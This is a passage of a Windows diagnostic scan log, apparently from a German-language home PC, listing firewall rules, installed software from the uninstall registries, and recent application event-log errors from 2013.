"{E2E56FB5-755A-42A9-8A73-E880A0A13AE4}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{E484B1B6-C9CC-44A0-9B1A-14E884C1F0F5}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{EA8F5F1F-F977-40E7-A979-228DB1386A04}" = lport=2869 | protocol=6 | dir=in | app=system |
"{ECB97293-6157-4B56-A4ED-DFA434334AE6}" = lport=161 | protocol=17 | dir=in | name=druckvorgang |
"{F157BA55-7A62-4FB1-A0B3-8A82A599FA56}" = lport=138 | protocol=17 | dir=in | app=system |
"{F9E44214-6BC0-4487-8EC6-AB7B30018A81}" = lport=139 | protocol=6 | dir=in | app=system |
========== Vista Active Application Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02B9C774-B905-41FC-A2D1-75DF4619E895}" = dir=in | app=c:\program files\windows live\messenger\msnmsgr.exe |
"{0A5D1B97-BBE1-495D-BBBF-F30D4F93162D}" = protocol=17 | dir=in | app=c:\program files\steam\steam.exe |
"{0BAF21EF-E9FC-4CF4-93B0-3ED23A7158E8}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe |
"{0C32669F-9681-40CE-A1D4-C7AB38968466}" = protocol=6 | dir=out | app=system |
"{389B7691-D2B7-4C32-981C-C0E2E19DB03E}" = dir=in | app=c:\program files\itunes\itunes.exe |
"{50E11D82-CDA2-4E47-AAD9-95823320FC4C}" = protocol=6 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{51A3D040-9C95-42E2-BE71-1B9AD02ED48B}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{52E95DAA-933C-4D68-9697-3CF80F64C39A}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{54A09723-E23A-4A6F-A840-10DC2ED4C344}" = protocol=6 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{63E29624-2FE6-42EB-99F6-33773F75B861}" = protocol=6 | dir=in | app=c:\program files\steam\steam.exe |
"{756C08B9-7CDD-4990-B794-C4ADD80BB032}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{7AF5684D-E528-4F82-926D-674F83F20695}" = dir=in | app=c:\program files\skype\phone\skype.exe |
"{7C6897E3-B4C4-450F-9764-FE373F7CFDAA}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{7DF486C3-196E-4F8A-AC7C-222230CD76A3}" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{81656EC6-C46F-4AFD-8484-CE9DFE27EB8E}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{819D59A3-99E3-4B76-9FAF-F28AE3C434DF}" = dir=in | app=c:\program files\windows live\messenger\wlcsdk.exe |
"{848E79B3-00E7-4552-BF0F-B162002B4C7C}" = protocol=17 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{84DE97A2-5504-4898-A5A1-CEF0EDDE3321}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{906D20E7-3A39-4285-974C-590269957501}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{94EA64CE-4D98-4475-985C-235F63CC60FE}" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{9544BF85-15F9-44AB-A29D-7AC0463E094B}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{96F774E7-DCCB-4B20-9E12-0946056C59C6}" = dir=in | app=c:\program files\cyberlink\powerdvd\powerdvd.exe |
"{9F1D8106-7399-41E8-9482-52ED00FFAED6}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{A614BE8C-9BD6-4394-991C-6DACC3AD9742}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{A7FE49D8-6A96-4DCB-9FDA-F1F57BB7A8F0}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{A9FA9560-6BC2-4BD0-814B-4C3DB20A60E9}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{B847FD48-FA6D-4C76-B86F-8F23E7404D85}" = protocol=17 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{C2312C03-1D0F-418D-B134-733F7279A5F5}" = protocol=6 | dir=out | app=c:\windows\system32\wudfhost.exe |
"{D78B0574-F8C5-4F89-8149-1AEB518B1E5E}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{E25E6FA1-EDBB-4599-B619-D0A05BF2F11B}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{EAAAB938-3FB4-41E7-9EB3-93867BBC6639}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{EE7CB5C6-BD08-41F2-9C8C-0F81FD3A9763}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{F8E7FAB1-45F0-4D7B-B5F5-162903729B9C}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{FE806151-3416-42AC-9A96-3634510E4ABC}" = protocol=6 | dir=out | svc=upnphost | app=c:\windows\system32\svchost.exe |
"TCP Query User{1C44A64E-7EB0-4B06-93EA-2D4268F1C6C4}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"TCP Query User{422D3EAE-E423-4344-B580-6B7A3F5818B0}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=6 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"TCP Query User{49FA6209-ED38-4394-A976-664D2601A759}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{54F32131-E99A-4B90-9163-52790E026ACF}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"TCP Query User{99B64360-59F8-4411-A29D-5EFC517B40CF}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{9A951EC7-7B4B-48ED-8239-26A5AFF9EF09}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=6 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"TCP Query User{9C81CDE5-82E8-4636-A73D-1A6A092697FF}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"TCP Query User{AD32AB7E-B300-488E-B15C-C2B182DAB005}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"TCP Query User{BF26C7E1-3F10-4A71-8C98-5B1C0B422B22}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"TCP Query User{CC5AEAA9-C7DE-4782-AB51-DB1C20F0E021}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"TCP Query User{D2E5FFA7-7229-473F-93F7-2CD32C4E4C8F}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"TCP Query User{F131C037-70F7-4E1B-B8B7-E614FACAC880}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"UDP Query User{012AFCFB-BD0A-40C9-B628-5B7B63313513}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"UDP Query User{04D70229-8EC9-4E6C-8FA7-E4930955B82F}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"UDP Query User{0D93800B-6DA5-4E7F-B294-18BA28D202CF}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"UDP Query User{1754187E-B36D-4F86-B60B-94CBA11C63F8}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=17 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"UDP Query User{B21A7ADF-A21C-4F06-84B4-C03ABC2BF0A7}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"UDP Query User{BA919B03-07EC-4F47-895D-7FA00128CCB8}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"UDP Query User{C2282B50-D257-42B4-8E3F-A9427757132F}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{C7D5BAF4-10A1-4D73-8D53-74E7C831C723}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{DF097255-0F5C-45B0-81F7-FAEAF073FF5C}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=17 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"UDP Query User{E4201583-CF21-48F5-9888-A1ED5E7215F8}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"UDP Query User{FA82C556-4213-412C-9542-F1389C34D65C}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"UDP Query User{FF74768D-8101-423A-AB2E-BE1C00960A59}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
========== HKEY_LOCAL_MACHINE Uninstall List ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
"{03655260-E933-4DD9-939B-46E8ABCB1184}" = 11589 DVB-T x86
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu
"{07629207-FAA0-4F1A-8092-BF5085BE511F}" = Unterstützungsdateien für das Microsoft SQL Server-Setup (Englisch)
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{0E64B098-8018-4256-BA23-C316A43AD9B0}" = QuickTime
"{11083C7A-D0D6-4DA4-8C3A-74B8389EC07B}" = ATI Catalyst Registration
"{11316260-6666-467B-AC34-183FCB5D4335}" = Acer Mobility Center Plug-In
"{116FF17B-1A30-4FC2-9B01-5BC5BD46B0B3}" = Acer eLock Management
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7
"{1EBD33A9-2AAF-4CE6-8D62-9D3634C8B43B}" = HP Officejet 6500 E710n-z - Grundlegende Software für das Gerät
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live-Uploadtool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216013FF}" = Java(TM) 6 Update 21
"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Atheros for Acer Driver v7.2.0.208_Foxconn Installation Program
"{2EEC2A94-7204-45C6-93BB-67EAEB19E4D6}" = Safari
"{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}" = HP Update
"{3921A67A-5AB1-4E48-9444-C71814CF3027}" = VCRedistSetup
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{41E654A9-26D0-4EAC-854B-0FA824FFFABB}" = Windows Live Messenger
"{459699C3-9430-4381-964B-4248D87B49F9}" = Apple Mobile Device Support
"{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}" = Apple Application Support
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4EF8BE6A-899C-4196-94E7-297C5F7A203E}" = pdfforge Toolbar v1.1.1
"{50120000-1105-0000-0000-0000000FF1CE}" = Microsoft Office 2007 Primary Interop Assemblies
"{56C049BE-79E9-4502-BEA7-9754A3E60F9B}" = neroxml
"{58E5844B-7CE2-413D-83D1-99294BF6C74F}" = Acer ePower Management
"{5968F27A-66E6-171E-5311-0A74D74AAD9B}" = ATI Catalyst Install Manager
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{5FC68772-6D56-41C6-9DF1-24E868198AE6}" = Windows Live Call
"{5FCCD531-1B38-4A94-924C-127F722F1031}" = Nero 8
"{5FD89EA1-99C2-40EE-BBF5-20F8991ED756}" = Catalyst Control Center - Branding
"{65DA2EC9-0642-47E9-AAE2-B5267AA14D75}" = Activation Assistant for the 2007 Microsoft Office suites
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}" = Bing Bar
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7AB86D35-DF3B-407F-B43E-468345DABF29}" = SL-6555-SBK
"{7CC673E7-5271-409D-B196-BB76DA60300B}" = Twonky Windows Components
"{7ED4E9AB-9B5D-5380-9AB7-2865CA1DA0DB}" = AMD Fuel
"{7FB12670-0F93-4E1E-B2F5-4F339199A03A}" = Microsoft SQL Server Native Client
"{849A32C3-E75A-4791-9B11-E568BA3525A4}" = Microsoft SQL Server VSS Writer
"{85092B90-AEB2-2E30-0EF1-432EC61F6BD1}" = Catalyst Control Center InstallProxy
"{86B247F9-1D5E-CCC6-3280-71486D9A4E70}" = ATI Stream SDK v2 Developer
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{88410D8F-8529-492B-B556-2394A29B811B}" = Broadcom Driver v4.102.15.63_Foxconn Installation Program
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8ACC73AA-6511-7C55-B1A9-8E5D1DEAFAA3}" = The Lord of the Rings FREE Trial
"{90120000-0016-0407-0000-0000000FF1CE}" = Microsoft Office Excel MUI (German) 2007
"{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0407-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (German) 2007
"{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0407-0000-0000000FF1CE}" = Microsoft Office Word MUI (German) 2007
"{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2007
"{90120000-001F-0407-0000-0000000FF1CE}_HOMESTUDENTR_{928D7B99-2BEA-49F9-83B8-20FA57860643}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_HOMESTUDENTR_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_HOMESTUDENTR_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2007
"{90120000-001F-0410-0000-0000000FF1CE}_HOMESTUDENTR_{A23BFC95-4A73-410F-9248-4C2B48E38C49}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}_HOMESTUDENTR_{A6353E8F-5B8D-47CC-8737-DFF032ED3973}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A1-0407-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (German) 2007
"{90120000-00A1-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-0019-0407-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (German) 2010
"{90140000-0019-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2010
"{90140000-001F-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{65A2328E-FDFB-4CA3-8582-357EA6825FEA}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}_Office14.PUBLISHERR_{99ACCA38-6DD3-48A8-96AE-A283C9759279}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-040C-0000-0000000FF1CE}_Office14.PUBLISHERR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2010
"{90140000-001F-0410-0000-0000000FF1CE}_Office14.PUBLISHERR_{C0743197-FFEE-4C19-BAEB-8F7437DC4C8A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2010
"{90140000-002C-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{4275FB46-ABDF-4456-876C-17CF64294D9A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2010
"{90140000-006E-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{98EDFD9F-EA76-40CC-BCE9-92C69413F65B}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{90A40407-6000-11D3-8CFE-0150048383C9}" = Microsoft Office 2003 Web Components
"{91120000-002F-0000-0000-0000000FF1CE}" = Microsoft Office Home and Student 2007
"{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{91140000-0019-0000-0000-0000000FF1CE}" = Microsoft Office Publisher 2010
"{91140000-0019-0000-0000-0000000FF1CE}_Office14.PUBLISHERR_{047B0968-E622-4FAA-9B4B-121FA109EDDE}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{99E862CC-6F69-4D39-99AA-DBF71BF3B585}" = OpenOffice.org 3.1
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A5633652-3795-4829-BB0B-644F0279E279}" = Acer eDataSecurity Management
"{A77255C4-AFCB-44A3-BF0F-2091A71FFD9E}" = Acer Crystal Eye Webcam 2.0.9.2
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A939D341-5A04-4E0A-BB55-3E65B386432D}" = Microsoft Office Small Business Connectivity Components
"{AB6097D9-D722-4987-BD9E-A076E2848EE2}" = Acer Empowering Technology
"{AC4C38FD-A54C-4CA5-92EE-D983CD81293E}" = Microsoft Xbox 360 Accessories 1.2
"{AC76BA86-7AD7-1031-7B44-A95000000001}" = Adobe Reader 9.5.5 - Deutsch
"{AC76BA86-7AD7-5464-3428-900000000004}" = Spelling Dictionaries Support For Adobe Reader 9
"{AEBBFC67-7A03-4DF3-9E71-BA5C9EB4FBEF}" = MobileMe Control Panel
"{B0261E53-B6F1-474A-864B-E7C3CBF468E0}" = iTunes
"{B3276CB1-20B6-4AF9-AAEC-E72C83816495}" = IKEA Home Planner
"{C06554A1-2C1E-4D20-B613-EE62C79927CC}" = Acer eNet Management
"{C7EA1AF1-F908-0832-AA52-5EDBE128FD6B}" = ccc-core-static
"{CA6BCA2F-EDEB-408F-850B-31404BE16A61}" = I.R.I.S. OCR
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{CE386A4E-D0DA-4208-8235-BCE43275C694}" = LightScribe 1.4.142.1
"{CE65A9A0-9686-45C6-9098-3C9543A412F0}" = Acer eSettings Management
"{D642E38E-0D24-486C-9A2D-E316DD696F4B}" = Microsoft XML Parser
"{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}" = NVIDIA PhysX
"{E1640DA5-89B4-4F52-B15D-5DA3D14F29D4}" = LG USB Modem Drivers
"{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV
"{E9D4FBA9-FB46-A5CE-F52F-516C4B8F0373}" = ccc-utility
"{EB0E062C-575D-8154-2682-C84EF432CCF0}" = Catalyst Control Center Graphics Previews Common
"{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform
"{EE7257A2-39A2-4D2F-9DAC-F9F25B8AE1D8}" = Skype™ 5.10
"{EEA54973-AFC8-21C8-1414-246AA9435890}" = CCC Help English
"{EFBC0CB1-AFFD-4E74-ACEF-42099F1D49C3}" = HP Officejet 6500 E710n-z Hilfe
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F1FCC8AD-0F88-4D77-8530-0FBB088485F1}" = WEB.DE Update
"{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}" = Microsoft Office Live Add-in 1.5
"{F8FF18EE-264A-43FD-B2F6-5EAD40798C2F}" = Windows Live Essentials
"{FB0C267C-8B4F-4867-8161-A6A3B66D42C1}" = Marketsplash Schnellzugriffe
"{FB91E774-867B-4567-ACE7-8144EF036068}" = Olympus Digital Wave Player
"Activation Assistant for the 2007 Microsoft Office suites" = Activation Assistant for the 2007 Microsoft Office suites
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"AVerMedia A835 USB TV Tuner" = AVerMedia A835 USB TV Tuner 8.0.0.43
"Avira AntiVir Desktop" = Avira Free Antivirus
"AVMFBox" = AVM FRITZ!Box Dokumentation
"AVMFBoxPrinter" = AVM FRITZ!Box Druckeranschluss
"CCleaner" = CCleaner
"CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFAOR2C06_118" = HDAUDIO Soft Data Fax Modem with SmartCP
"CornelsenSTVP72" = Cornelsen Stoffverteilungsplaner 7.2
"Deutschbuch Arbeitsblattgenerator" = Deutschbuch Arbeitsblattgenerator
"DivX Setup.divx.com" = DivX-Setup
"Druckschriften Nord_is1" = Pelikan Schulschriften
"Free YouTube to MP3 Converter_is1" = Free YouTube to MP3 Converter version 3.2
"Google Chrome" = Google Chrome
"GridVista" = Acer GridVista
"HOMESTUDENTR" = Microsoft Office Home and Student 2007
"InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"InstallShield_{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7
"InstallShield_{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow
"InstallShield_{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV
"KLiteCodecPack_is1" = K-Lite Codec Pack 8.0.0 (Full)
"LManager" = Launch Manager
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware Version 1.51.2.1300
"MediaManager" = MediaManager
"Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Mozilla Thunderbird (2.0.0.24)" = Mozilla Thunderbird (2.0.0.24)
"MPE" = MyPhoneExplorer
"NetDrive" = NetDrive
"Office14.PUBLISHERR" = Microsoft Publisher 2010
"ownCloud" = ownCloud
"Picasa 3" = Picasa 3
"PriceGong" = PriceGong 2.6.11
"RemoteDesktopServer" = RemoteDesktopServer
"Rossmann Fotowelt Software" = Rossmann Fotowelt Software 4.9
"SCHLECKER Foto Digital Service" = SCHLECKER Foto Digital Service
"Schroedel Arbeitsblätter" = Schroedel Arbeitsblätter
"Schulausgangsschrift SAS_is1" = Pelikan Schulschriften
"Steam App 35150" = Lara Croft and the Guardian of Light Demo
"Steam App 48010" = LIMBO Demo
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"Trine 2_is1" = Trine 2
"Uninstall_is1" = Uninstall 1.0.0.1
"VLC media player" = VLC media player 0.9.9
"WEB.DE Update" = WEB.DE Update
"WinLiveSuite_Wave3" = Windows Live Essentials
"WinRAR archiver" = WinRAR
========== HKEY_CURRENT_USER Uninstall List ==========
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"17d33ce3121ed6e5" = Das Mathe Programm
"Game Organizer" = GameXN GO
"JNLP" = JNLP
"Lumines - Puzzle Fusion" = Lumines - Puzzle Fusion
========== Last 20 Event Log Errors ==========
[ Application Events ]
Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 5817527
Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 5817527
Error - 28.05.2013 02:04:07 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 28.05.2013 08:04:24 | Computer Name = ant-PC | Source = EventSystem | ID = 4621
Description =
Error - 28.05.2013 13:26:55 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 30.05.2013 15:05:48 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 08:16:52 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 08:58:42 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 11:09:38 | Computer Name = ant-PC | Source = Application Error | ID = 1000
Description = Fehlerhafte Anwendung SynTPEnh.exe, Version 10.0.15.0, Zeitstempel
0x46e19971, fehlerhaftes Modul SynTPEnh.exe, Version 10.0.15.0, Zeitstempel 0x46e19971,
Ausnahmecode 0xc0000409, Fehleroffset 0x000289dc, Prozess-ID 0x10b8, Anwendungsstartzeit
01ce5f914251a286.
